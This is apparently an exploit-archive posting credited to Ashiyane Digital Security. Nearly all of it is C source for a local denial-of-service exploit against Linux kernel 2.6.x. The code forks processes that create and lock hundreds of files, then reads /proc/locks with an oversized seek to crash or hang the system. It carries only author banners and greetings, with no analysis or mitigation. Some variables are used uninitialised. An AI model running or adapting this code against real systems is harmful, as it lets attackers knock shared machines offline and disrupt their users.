Security

  Text :  

####

[+] Exploit Title: Linux Kernel 2.6.x Local Denial of Service Exploit


[+] Author: Ashiyane Digital Security Members

[+] Version: 2.*.*

[+] Tested on: 2.6.10

####

[ Exploit ]

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <linux/unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/file.h>
#include <syscall.h>
#include <errno.h>

#define SIZE 0x80004242

_syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res,
uint, wh);

void createfile(){
int Numbre1, filev;
char Namev[424];
for(Numbre1=0;Numbre1<920;Numbre1++){
snprintf(Namev, sizeof(Namev), "UNLOCKRESEARCHTEAM%d.%d",
getpid(), Numbre1);
filev = open(Namev, O_CREAT|O_RDWR, S_IRWXU);
if(filev < 0){
printf("Bad Error\n");
perror("open()");
}
if(flock(filev,LOCK_EX) == -1){
printf("Bad Error\n");
perror("flock()");
}
}
while(42);
}
int main(int argc, char *argv[]){
int count, fd, i, fv;
void *mv;
char *buf1, *buf2;
loff_t lr;
int Numbre1;
printf("\t\tkernel 2.6.* DoS Exploit By Cair3x\n");
printf("[--]Make File...");
Numbre1 = 5;
while(count--){
if(!fork()){
createfile();
}
}
sleep(100);
printf("OK\n");
printf("start exploiting...");
system("sync");
fd=open("/proc/locks", O_RDONLY);
if(fd < 0){
printf("Bad ERROR\n");
perror("open()");
}
buf1 = malloc(1024*1024*8);
buf2 = malloc(1024*1024*8);
if(_llseek(fd,42,SIZE,&lr,SEEK_SET) == -1){
printf("Bad ERROR\n");
printf("llseek()");
}
i=read(fd,buf2, SIZE);
perror("read");
printf("read=%d mv=%x fv=%x\n %.300s",i,(int)mv,fv,buf2);
while(42);
return 42;
}


[ / Exploit ]


#################################################################

BY : Cair3x [Cair3x.Support@Gmail.com]

Web Site : Ashiyane.org

Forum : Http://Ashiyane.org/forums/

[+] Greetz to All Ashiyane Digital Security Member

####